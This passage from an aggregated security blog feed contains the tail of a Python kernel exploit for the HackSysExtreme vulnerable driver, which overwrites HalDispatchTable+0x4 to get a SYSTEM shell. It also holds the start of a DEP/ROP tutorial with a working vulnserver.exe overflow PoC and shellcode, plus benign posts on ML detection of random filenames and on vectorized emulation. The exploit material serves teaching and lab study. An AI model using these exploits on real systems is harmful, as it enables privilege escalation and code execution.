        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here, is where the What and Where come into play. We create a variable called write_what_where and we call the What pointer from the class created called WriteWhatWhere(). That value gets set to equal the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. And in the end, a pointer to the variable write_what_where, which has inherited all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed in the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peak here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. Our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that location of HalDispatchTable + 0x4 (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls HalDispatchTable + 0x4) gets executed. And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

24 October 2019 at 17:22
TL;DR LSP4XML, the library used to parse XML files in VSCode-XML, Eclipse’s wildwebdeveloper, theia-xml and more, was affected by an XXE (CVE-2019-18213) which lead to RCE (CVE-2019-18212) exploitable by just opening a malicious XML file. Introduction 2019 seems to be XXE’s year: during the latest Penetration Tests we successfully exploited a fair amount of XXEs, an example being https://www.shielder.it/blog/exploit-apache-solr-through-opencms/. It all started during a web application penetration test, while I was trying to exploit a blind XXE with zi0black.

Exploiting an old noVNC XSS (CVE-2017-18635) in OpenStack

19 October 2019 at 17:40
TL;DR: noVNC had a DOM-based XSS that allowed attackers to use a malicious VNC server to inject JavaScript code inside the web page. As OpenStack uses noVNC and its patching system doesn’t update third parties’ software, fully-updated OpenStack installations may still be vulnerable. Introduction Last week I was testing an OpenStack infrastructure during a Penetration Test. OpenStack is a free and open-source software platform for cloud computing, where you can manage and deploy virtual servers and other resources.

Detecting random filenames using (un)supervised machine learning

By: Fox IT
16 October 2019 at 11:00

Combining both n-grams and random forest models to detect malicious activity.

Author: Haroen Bashir

An essential part of Managed Detection and Response at Fox-IT is the Security Operations Center. This is our frontline for detecting and analyzing possible threats. Our Security Operations Center brings together the best in human and machine analysis and we continually strive to improve both. For instance, we develop machine learning techniques for detecting malicious content such as DGA domains or unusual SMB traffic. In this blog entry we describe a possible method for random filename detection.

During traffic analysis of lateral movement we sometimes recognize random filenames, indicating possible malicious activity or content. Malicious actors often need to move through a network to reach their primary objective, more popularly known as lateral movement [1].

There is a variety of routes for adversaries to perform lateral movement. Attackers can use penetration testing frameworks such as Metasploit [3] or Microsoft Sysinternal application PsExec. This application creates the possibility for remote command execution over the SMB protocol [4].

Due to its malicious nature we would like to detect lateral movement as quickly as possible. In this blogpost we build on our previous blog entry [2] and we describe how we can apply the magic of machine learning in detection of random filenames in SMB traffic.

Supervised versus unsupervised detection models 

Machine learning can be applied in various domains. It is widely used for prediction and classification models, which suits our purpose perfectly. We investigated two possible machine learning architectures for random filename detection.

The first detection method for random filenames is set up by creating bigrams of filenames,  which you can find more information about in our previous post [2]. This detection method is based on unsupervised learning. After the model learns a baseline of common filenames, it can now detect when filenames don’t belong in its learned baseline.

This model has a drawback; it requires a lot of data. The solution can be found with supervised machine learning models. With supervised machine learning we feed a model data whilst simultaneously providing the label of the data. In our current case, we label data as either random or not-random.

A powerful supervised machine learning model is the random forest. We picked this architecture as it’s widely used for predictive models in both classification and regression problems. For an introduction into this technique we advise you to see [4]. The random forest is based on multiple decision trees, increasing the stability of a detection model. The following diagram illustrates the architecture of the detection model we built.

Similar to the first model, we create bigrams of the filenames. The model cannot train on bigrams however, so we have to map the bigrams into numerical vectors. After training and testing the model we then focus on fine-tuning hyperparameters. This is essential for increasing the stability of the model. An important hyperparameter of the random forest is depth. A greater depth will create more decision splits in the random forest, which can easily cause overfitting. It is therefore highly desirable to keep the depth as low as possible, whilst simultaneously maintaining high precision rates.Results

Proper data is one of the most essential parts in machine learning. We gathered our data by scraping nearly 180.000 filenames from SMB logs of our own network. Next to this, we generated 1.000 random filenames ourselves. We want to make sure that the models don’t develop a bias towards for example the extension “.exe”, so we stripped the extensions from the filenames.

As we stated earlier the bigrams model is based on our previously published DGA detection model. This model has been trained on 90% percent of filenames. It is then tested on the remaining filenames and 100% of random filenames.

The random forest has been trained and tested in multiple folds, which is a cross validation technique[6]. We evaluate our predictions in a joint confusion matrix which is illustrated below.

True positives are shown in the upper right column, the bigrams model detected 71% of random filenames and the random forest detected 81% of random filenames. As you can see the models produce low false positive rates, in both models ~0% of not random filenames have been incorrectly classified as random. This is great for use in our Security Operations Center, as this keeps the workload on the analysts consistent.

The F1-scores are 0.83 and 0.89 respectively. Because we focus on adding detection with low false positive rates, it is not our priority to reduce the false negative rates. In future work we will take a better look at the false negative rates of the models.

We were quite interested in differences in both detection models. Looking at the visualization below we can observe that both models equally detect 572 random filenames. They separately detect 236 and 141 random filenames respectively. The bigrams model might miss more random filenames due to its unsupervised architecture. It is possible that the bigrams model requires more data to create it’s baseline and therefore doesn’t perform as well as the supervised random forest.The overlap in both models and the low false positive rate gave us the idea to run both these models cooperatively for detection of random filenames. It doesn’t cost much processing and we would gain a lot! In practical setting this would mean that if a random filename slips by one detection model, it is still possible for the other model to detect this. In theory, we detect 90% of random filenames! The low false positive rates and complementary aspects of the detection models indicate that this setup could be really useful for detection in our Security Operations Center.

Conclusion

During traffic analysis in our Security Operations Center we sometimes recognize random filenames, indicating possible lateral movement. Malicious actors can use penetration testing frameworks (e.g. Metasploit) and Microsoft processes (e.g. PsExec) for lateral movement. If adversaries are able to do this, they can easily compromise a (sub)network of a target. Needless to say that we want to detect this behavior as quickly as possible.

In this blog entry we described how we applied machine learning in order to detect these random filenames. We showed two models for detection: a bigrams model and a random forest. Both these models yield good results in testing stage, indicated by the low false positive rates. We also looked at the overlap in predictions from which we concluded that we can detect 90% of random filenames in SMB traffic! This gave us the idea to run both detection models cooperatively in our Security Operations Center.

For future work we would like to research the usability of these models on endpoint data, as our current research is solely focused on detection in network traffic. There is for instance lots of malware that outputs random filenames on a local machine. This is just one of many possibilities which we can better investigate.

All in all, we can confidently conclude that machine learning methods are one of many efficient ways to keep up with adversaries and improve our security operations!

 

References

[1] – https://attack.mitre.org/tactics/TA0008/

[2] – https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains.

[3] – https://www.offensive-security.com/metasploit-unleashed/pivoting/

[4] – https://www.mindpointgroup.com/blog/lateral-movement-with-psexec/

[5] – https://medium.com/@williamkoehrsen/random-forest-simple-explanation-377895a60d2d

[6] – https://towardsdatascience.com/why-and-how-to-cross-validate-a-model-d6424b45261f

 

 

 

 

 

Miniblog: How conditional branches work in Vectorized Emulation

7 October 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!


Prereqs

You should probably read the Introduction to Vectorized Emulation blog!

Or perhaps watch the talk I gave at RECON 2019

Summary

I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.

This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example. What I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emit simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.


FalkIL Example

Here’s an example of what FalkIL looks like:

FalkIL example


JIT

Here’s what the JIT for the above IL example looks like:

FalkIL JIT example

Ooof… that exploded a bit. Let’s dive in!


JIT Calling Convention

Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.

Kmask Registers

Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.

Intel provides us with 8 kmask registers. k0 through k7. k0 is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.

Online VM mask

Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since k1 is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in k1 (VM is disabled), must not have its state modified. Thus you’ll see k1 is used as a merging mask for almost every single vectorized operation we do.

By using the k1 mask in every instruction, we preseve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.

This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).

“Following” VM mask

At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in k7. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.

The VM we are “following” must always be active, and thus (k7 & k1) != 0 must always be true! This k7 mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this k7 mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).

Kmask Register Summary

Here’s the complete state of kmask register allocation during JIT

K0    - Hardcoded in hardware to all ones
K1    - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7    - "Following" VM mask

ZMM registers

The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.

“Following” VM index vector

Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of zmm30. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.

By holding the index (effectively the bit index of the following VM mask) in all lanes of the zmm30 vector, we can perform a single vpermq instruction to broadcast the following VM’s value to all lanes in a vector.

Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirity of a JIT execution (until a JIT/VM exit).

Why this is important

Lets say:

zmm31 contains [10, 11, 12, 13, 14, 15, 16, 17]

zmm30 contains [3, 3, 3, 3, 3, 3, 3, 3]

The CPU then executes vpermq zmm0, zmm30, zmm31

zmm0 now contains [13, 13, 13, 13, 13, 13, 13, 13]… the 3rd VM’s value in zmm31 broadcast to all lanes of zmm0

Effectively vpermq uses the indicies in its second operand to select values from the third operand.

“Desired target” vector

We allocate one other ZMM register (zmm31) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, zmm31 will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(

ZMM Register Summary

Here’s the complete state of ZMM register allocation during JIT

Zmm0-Zmm3  - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30      - Index of the VM we are following broadcast to all 8 quadwords
Zmm31      - Branch targets for each VM, indicates where all VMs want to execute

General purpose registers

These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the MMU blog!

When ignoring the MMU, there are only 2 GPRs that we have a special use for…

Constant storage database

On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR mov, then moving it into the lowest-order lane of a vector vmovq, and then broadcasting it vpbroadcastq, is actually a lot more expensive than just loading that value from memory.

To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by r11 during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single vpbroadcastq zmm, kmask, qword [r11+OFFSET] instruction.

While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.

Target registers

At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by r12. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.

GPR summary

r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers

Phew

Okay, now we know what register states look like when executing in JIT!


Conditional branches

Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.

Here’s the specific code in question for a conditional branch:

Conditional Branch

Well that looks awfully complex… but it’s really not. It’s quite magical!

The comparison

comparison

First, the comparision is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into k2. This means that k2 will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask k1 here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, k2 has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.

In this case the 0x1 immediate to the vpcmpuq instruction indicates that this is a “less than” comparison.

vpcmpq/vpcmpuq immediate

Note that the immediate value provided to vpcmpq and the unsigned variant vpcmpuq determines the type of the comparison:

cmpimm

The comparison inversion

comparison inversion

Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.

kandnw performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have k2 as the second operand (the result of the comparison) this gets negated. This then gets anded with k1 (the third operand) to mask off VMs which are not actively executing. The result is that k3 now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.

In C/C++ this is simply: k3 = (~k2) & k1

The branch target vector

branch targets

Now we start constructing zmm0… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by r11) to load up the target labels. We first load the “true target” labels into zmm0 by using the k2 kmask, the “true” kmask. After this, we merge the “false target” labels into zmm0 using k3, the “false/inverted” kmask.

After these 2 instructions execute, zmm0 now holds the target “labels” based on their corresponding comparison results. zmm0 now tells us where the currently executing VMs “want to” branch to.

The merge into master

merge into master

Now we merge the target branches for the active VMs which were just computed (zmm0), into the master target register (zmm31). Since VMs can be disabled via divergence, zmm31 holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).

zmm31 now holds the target labels for every single lane with the updated results of this comparison!

Broadcasting the target

broadcasting the target

Now that we have zmm31 containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, zmm30 contains the index of the VM we are following in all 8 lanes.

Example

Lets say for example we are following VM #4 (zero-indexed).

zmm30 contains [4, 4, 4, 4, 4, 4, 4, 4]

zmm31 contains [block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]

After the vpermq instruction we now have zmm1 containing [block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2].

Effectively, zmm1 will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!

Auto-merging

auto-merging

This is where the magic happens. zmm31 contains where all the VMs “want to execute”, and zmm1 from the above instruction contains where we are actually going to execute. Thus, we compute a new k1 (active VM kmask) based on equality between zmm31 and zmm1.

Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!

Doin’ the branch

branching

Now we’re at the end. k2 still holds the true targets. We and this with k7 (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.

We then need to make this result “actionable” by getting it into the eflags x86 register such that we can conditionally branch. This is done with a simple kortestw instruction of k2 with itself. This will cause the zero flag to get set in eflags if k2 is equal to zero.

Once this is done, we can do a jnz instruction (same as jne), causing us to jump to the true target path if the k2 value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).


Update

After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.

updated JIT

Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into zmm31 using the online mask (k1). This temporarly marks that “all online VMs want to take the false target”. Then, using the k2 mask (true targets), merge over zmm31 with the true target block labels.

Simple! We remove the inverse mask computation kandnw, and the use of the zmm0 temporary and merge directly into zmm31. But the effect is exactly the same as the previous version.

Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!

Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a minimum 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are everywhere!


Fin

And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)

It’s important to note that this auto-merging isn’t perfect, and most cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.

I hope this was a fun read! Let me know if you want more of these mini-blogs.


Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get ran?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f options specifies the file. The -r option specifies maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find a flOldProtect address. You can literally place any address in this parameter, that contains writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an arbitrary parameter variable for a parameter called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The address of return is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

